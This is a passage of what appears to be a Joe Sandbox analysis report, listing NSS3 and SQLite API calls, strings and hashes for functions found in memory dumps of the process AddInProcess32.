                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error___swprintf_l$CriticalCurrentEnterExplodeFileInitLastLockPrintR_vsmprintfR_vsnprintfSectionThreadTime
                                                                                      • String ID: _PR_MD_LOCKFILE() failed. Error: %d
                                                                                      • API String ID: 3916023010-3062140089
                                                                                      • Opcode ID: 3d0a09351c1f4627d125df1d80736cc3e8bd0cb6e0c433c7e638ed2fbbfb536a
                                                                                      • Instruction ID: 2e42dbc6141b79ee58af2b259ed86b00c20cb84071c4990bd16a4fd3cf4ed045
                                                                                      • Opcode Fuzzy Hash: 3d0a09351c1f4627d125df1d80736cc3e8bd0cb6e0c433c7e638ed2fbbfb536a
                                                                                      • Instruction Fuzzy Hash: 1AE01231307174AB5A2066BA9C09CC7BE7CDF036F97114365FA2DD65D0E6109844D6E5
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?), ref: 6CCD0D06
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_Unlock.NSS3(?,?,?,?), ref: 6CCD0D11
                                                                                      • PR_LogPrint.NSS3(PR_Counter: Decrement: %p, %ld,?,?,?,?), ref: 6CCD0D2C
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      Strings
                                                                                      • PR_Counter: Decrement: %p, %ld, xrefs: 6CCD0D27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalEnterSection___swprintf_l$CurrentExplodeInitLockPrintR_vsmprintfR_vsnprintfThreadTimeUnlock
                                                                                      • String ID: PR_Counter: Decrement: %p, %ld
                                                                                      • API String ID: 3006167985-1079628343
                                                                                      • Opcode ID: c3ec5cd187cb283ea1acf49786dda871ec7e811df88ada3c86af0ffc48b3793a
                                                                                      • Instruction ID: 284287fb23693e425cd9c74d325b0222b97d717de33bb391ae581f2cf6f58dc5
                                                                                      • Opcode Fuzzy Hash: c3ec5cd187cb283ea1acf49786dda871ec7e811df88ada3c86af0ffc48b3793a
                                                                                      • Instruction Fuzzy Hash: A5E08632001614BFDB105F94EC00C87BBF9FF05228745896EE65D02920EB32F418DB81
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?), ref: 6CCD0FE9
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_Unlock.NSS3(?,?,?,?), ref: 6CCD0FF4
                                                                                      • PR_LogPrint.NSS3(PR_Counter: Increment: %p, %ld,?,?,?,?), ref: 6CCD100F
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      Strings
                                                                                      • PR_Counter: Increment: %p, %ld, xrefs: 6CCD100A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalEnterSection___swprintf_l$CurrentExplodeInitLockPrintR_vsmprintfR_vsnprintfThreadTimeUnlock
                                                                                      • String ID: PR_Counter: Increment: %p, %ld
                                                                                      • API String ID: 3006167985-108530118
                                                                                      • Opcode ID: a49b72521c0d6ea0e79f196daf67c6b8c515fe5795385552ed935cd434d03ba7
                                                                                      • Instruction ID: bea699e3dd3f2f9157052de9041d2d61b97a502771dbfb004d3061828d461e16
                                                                                      • Opcode Fuzzy Hash: a49b72521c0d6ea0e79f196daf67c6b8c515fe5795385552ed935cd434d03ba7
                                                                                      • Instruction Fuzzy Hash: 74E08632001314BFDB206F94EC00C96BBF9FF06238755855AE65E42921EB32F458D781
                                                                                      APIs
                                                                                      • sqlite3_mprintf.NSS3(unable to use function %s in the requested context,?), ref: 6CCA0DAA
                                                                                        • Part of subcall function 6CC63B3B: sqlite3_initialize.NSS3(?,6CC63A78,6CD51024,?,?), ref: 6CC63B3E
                                                                                      • sqlite3_result_error.NSS3(?,00000000,000000FF,unable to use function %s in the requested context,?), ref: 6CCA0DB5
                                                                                      • sqlite3_free.NSS3(00000000,?,00000000,000000FF,unable to use function %s in the requested context,?), ref: 6CCA0DBB
                                                                                        • Part of subcall function 6CC63D46: sqlite3_mutex_enter.NSS3(00000000,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D60
                                                                                        • Part of subcall function 6CC63D46: PR_Free.NSS3(6CCB8B5E,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D79
                                                                                        • Part of subcall function 6CC63D46: sqlite3_mutex_leave.NSS3(?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D85
                                                                                      Strings
                                                                                      • unable to use function %s in the requested context, xrefs: 6CCA0DA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Freesqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                      • String ID: unable to use function %s in the requested context
                                                                                      • API String ID: 236930007-47290733
                                                                                      • Opcode ID: 60535b28b1c911ab6c93621b5be5f755d675c6031f886e839bf58113afe8c1bc
                                                                                      • Instruction ID: 483f150926f1d4c336331c55d598070057fcc02b74fab3c134fd67dfb9662d39
                                                                                      • Opcode Fuzzy Hash: 60535b28b1c911ab6c93621b5be5f755d675c6031f886e839bf58113afe8c1bc
                                                                                      • Instruction Fuzzy Hash: 5ED02E330000243B8700269B9D80CEBBB1CCF823B03840290FA184BF50E720A82692F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FOREIGN KEY constraint failed$new$old
                                                                                      • API String ID: 0-384346570
                                                                                      • Opcode ID: 3268757fe3230e1f7e8f77d85349b84236a71664b88934fbc698d57147b292e2
                                                                                      • Instruction ID: ef52325b3bc5a78766e420bb47f46fe2568107b6b0707fe6bd9a9a65d9ddf7ee
                                                                                      • Opcode Fuzzy Hash: 3268757fe3230e1f7e8f77d85349b84236a71664b88934fbc698d57147b292e2
                                                                                      • Instruction Fuzzy Hash: 43E18CB1D04609AFEB11DFA4CC81FEEB7B8EF05304F144059F904E6681F736AA558BA5
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,00000060,?,?,00000000), ref: 6CC79D24
                                                                                      • sqlite3_malloc.NSS3(?,?,?,00000000), ref: 6CC79F1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetsqlite3_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 4178570951-0
                                                                                      • Opcode ID: 3cc5f9b47bf3202f14035c94f5e780ef20a2339b3f6706a21a067a31e18a2156
                                                                                      • Instruction ID: 92f860c1753984e94faf98d12f1c5c87db0fb76cfa5a37d9b45c5e363104a9cd
                                                                                      • Opcode Fuzzy Hash: 3cc5f9b47bf3202f14035c94f5e780ef20a2339b3f6706a21a067a31e18a2156
                                                                                      • Instruction Fuzzy Hash: 7AC14E71D01228DFDB24CFB9C980B9DBBB5FF49304F2481AAD919A7641E731A945CF60
                                                                                      APIs
                                                                                      • sqlite3_malloc.NSS3(6CC9B9B6,?,00000000,?,?,?,?,?,?,?,6CC9B9B6,?,0000000C), ref: 6CC7B0AF
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,6CC9B9B6,?,0000000C), ref: 6CC7B0C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetsqlite3_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 4178570951-0
                                                                                      • Opcode ID: 0ad9910edadcf845e5480ac7a91395bf95efb4d2971a4f5750e81107eb923e61
                                                                                      • Instruction ID: 5a1afc40cd340efb0da622d0d107e90b4d5110741759caecd7d763775b090930
                                                                                      • Opcode Fuzzy Hash: 0ad9910edadcf845e5480ac7a91395bf95efb4d2971a4f5750e81107eb923e61
                                                                                      • Instruction Fuzzy Hash: C0A1F8B5A05209DFCB24CF9AC59099DF7F5FF48314B2485AAE914EB711E730AA41CB60
                                                                                      APIs
                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6CD26CE0
                                                                                        • Part of subcall function 6CD1C18D: PL_HashTableLookupConst.NSS3(00000000,00000000,?,6CCE3515,00000000,?,6CCDBD71,?,?,?,?,?), ref: 6CD1C19A
                                                                                        • Part of subcall function 6CD1C18D: PORT_SetError_Util.NSS3(FFFFE08F,?,6CCE3515,00000000,?,6CCDBD71,?,?,?,?,?), ref: 6CD1C1BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ConstError_FindHashLookupTable
                                                                                      • String ID:
                                                                                      • API String ID: 1452533089-0
                                                                                      • Opcode ID: a8707d533d20dfacaa3f29b10a7b74aa967460f9d5110181480aa85dea1f3779
                                                                                      • Instruction ID: c63d1e0878ffc806e94087c3e1bce91474af75878a88412434ed38fb3e001ef8
                                                                                      • Opcode Fuzzy Hash: a8707d533d20dfacaa3f29b10a7b74aa967460f9d5110181480aa85dea1f3779
                                                                                      • Instruction Fuzzy Hash: E1713C3151930AEBDF208F25C840A9E77F8BF0035DB54856AEA18C5D31F339D96ACBA1
                                                                                      APIs
                                                                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,6CCCADD5,00000000,00000000,?,?,?,6CCCA922,6CCCADD5,6CCCADD1,?,6CCCADCF,6CCCADD5,?), ref: 6CCCA9E1
                                                                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,6CCCA922,6CCCADD5,6CCCADD1,?,6CCCADCF,6CCCADD5,?), ref: 6CCCAA32
                                                                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCCAAA8
                                                                                      • PR_strtod.NSS3(?,00000000), ref: 6CCCAAF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: isdigit$R_strtod
                                                                                      • String ID:
                                                                                      • API String ID: 760569117-0
                                                                                      • Opcode ID: eb84a590e7d5fef41f643be68a6719c8e30087b6b9765d3144624a9d02b0341b
                                                                                      • Instruction ID: c401f00fc6fb79e7df3a159d1594e55a6d8f0c06711a6fc04aaf90dd7e3ce0c1
                                                                                      • Opcode Fuzzy Hash: eb84a590e7d5fef41f643be68a6719c8e30087b6b9765d3144624a9d02b0341b
                                                                                      • Instruction Fuzzy Hash: 48615930605B41DFDB308F7AD588686BBF0EF59319B240A2ED59296D61E731E8C8CF52
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC8EF65
                                                                                      Strings
                                                                                      • duplicate column name: %s, xrefs: 6CC8EFED
                                                                                      • too many columns on %s, xrefs: 6CC8EF21
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: duplicate column name: %s$too many columns on %s
                                                                                      • API String ID: 3510742995-1445880494
                                                                                      • Opcode ID: 3eebfbe43b02358a8e8fe357052047197a313594d21b5e9deda7792a910db95c
                                                                                      • Instruction ID: fbd8f5c77eeb4bc740043a77f5595e0c14241927a8e4654dd87aefb20fd18ef0
                                                                                      • Opcode Fuzzy Hash: 3eebfbe43b02358a8e8fe357052047197a313594d21b5e9deda7792a910db95c
                                                                                      • Instruction Fuzzy Hash: 1541D271902501BFD7059F54C880ABEBFB4FF4A308F148199E9089BB51F735E916C7A1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFD053,00000001,?,?,?,6CD31EB7,00000001,00000000,00000016,?,?,BFFFFFFF,00000001,?,6CD31E70), ref: 6CD37CAA
                                                                                      • PORT_SetError_Util.NSS3(FFFFE892), ref: 6CD37E1C
                                                                                        • Part of subcall function 6CD42A05: memmove.VCRUNTIME140(468B1775,00000000,0F042418,00000001,?,6CD37DDE,00000001), ref: 6CD42A4D
                                                                                      • PR_GetError.NSS3 ref: 6CD37DE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$Errormemmove
                                                                                      • String ID:
                                                                                      • API String ID: 14310510-0
                                                                                      • Opcode ID: ed1ffcc2192754ffaadd34770b7cc33439e0dd22e06f520d124148052f8afc71
                                                                                      • Instruction ID: b7a429aef4fca0dc65a6d66a2ce7f2bab78f6083bbacf7bbd3a9fc7e01ccff1d
                                                                                      • Opcode Fuzzy Hash: ed1ffcc2192754ffaadd34770b7cc33439e0dd22e06f520d124148052f8afc71
                                                                                      • Instruction Fuzzy Hash: C6411331504B26FBEB119F69DE40BDB77F4AF4231DF21121CE819A1AB0D774E9548AA0
                                                                                      APIs
                                                                                      • PR_SecondsToInterval.NSS3(00000001,00000000,00000000,00000000,?,00000001,6CCF74DC,00000000,00000000), ref: 6CCFAFC0
                                                                                      • PK11_GetInternalKeySlot.NSS3(00000000,00000000,00000000,?,00000001,6CCF74DC,00000000,00000000), ref: 6CCFAFD5
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,00000000,00000000,?,00000001,6CCF74DC,00000000,00000000), ref: 6CCFAFE8
                                                                                      • PR_Now.NSS3(00000000,00000000,00000000,?,00000001,6CCF74DC,00000000,00000000), ref: 6CCFB011
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_Slot$FreeInternalIntervalSeconds
                                                                                      • String ID:
                                                                                      • API String ID: 3481577441-0
                                                                                      • Opcode ID: 845a0070a9cdac5aad3e1231b286302833e117b2c7485b17f289bd61ebd5b024
                                                                                      • Instruction ID: 4d07e5266f7e91338931b403a32951b38e977abf52ba4ca85fdb34000f87adbe
                                                                                      • Opcode Fuzzy Hash: 845a0070a9cdac5aad3e1231b286302833e117b2c7485b17f289bd61ebd5b024
                                                                                      • Instruction Fuzzy Hash: D741BEB1A056059FDB50CF65C894AAAB7F8FF46318F10041EE67693E50EB30E502CB55
                                                                                      APIs
                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(6CCCADD5,?,?,?,?,6CCCADCF,6CCCADD5,?), ref: 6CCCA85D
                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CCCADCF,6CCCADD5,?), ref: 6CCCA86D
                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCCA884
                                                                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CCCADCF,6CCCADD5,?), ref: 6CCCA8D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: isspace$isdigit
                                                                                      • String ID:
                                                                                      • API String ID: 2171383732-0
                                                                                      • Opcode ID: c4de09118281cb2be7e7bd2cf36ae08c9d2efe568b45c2ac708d71861d6ba2ea
                                                                                      • Instruction ID: 0260fcf2a0ab21bb93e7130c7030417912bd00bf1092703c4f199725f8e7b3e9
                                                                                      • Opcode Fuzzy Hash: c4de09118281cb2be7e7bd2cf36ae08c9d2efe568b45c2ac708d71861d6ba2ea
                                                                                      • Instruction Fuzzy Hash: 3E41C071608A42AFEB044F2AD88C355BBF8FF4A369F24021EE895C1841E770E5938BC1
                                                                                      APIs
                                                                                      • PR_Init.NSS3 ref: 6CCD4AB0
                                                                                      • gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6CCD4B2A
                                                                                      • GetLastError.KERNEL32(?,00000004,00000002), ref: 6CCD4B36
                                                                                      • PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CCD4BA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$InitLastgethostbyaddr
                                                                                      • String ID:
                                                                                      • API String ID: 76324382-0
                                                                                      • Opcode ID: 69362e7154cd2c28c593244ce1dea482419075ddf8b661f624365d1a38a2e088
                                                                                      • Instruction ID: 4f70429aa1015e2f01f302fa04b2a33c27803c971a39d8b9dd55df9fc416002c
                                                                                      • Opcode Fuzzy Hash: 69362e7154cd2c28c593244ce1dea482419075ddf8b661f624365d1a38a2e088
                                                                                      • Instruction Fuzzy Hash: 3A31E371608B01BEEB30CF6A8841B8677B8AB15338B1A4B5FF3A596CC0F760B584C351
                                                                                      APIs
                                                                                      • sqlite3_mprintf.NSS3(6CD51024,?), ref: 6CCB8932
                                                                                      • sqlite3_free.NSS3(?), ref: 6CCB8974
                                                                                      • sqlite3_mprintf.NSS3(?), ref: 6CCB8980
                                                                                        • Part of subcall function 6CC63C8F: sqlite3_initialize.NSS3(?,6CCBDDAD,?), ref: 6CC63C92
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CCB89BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
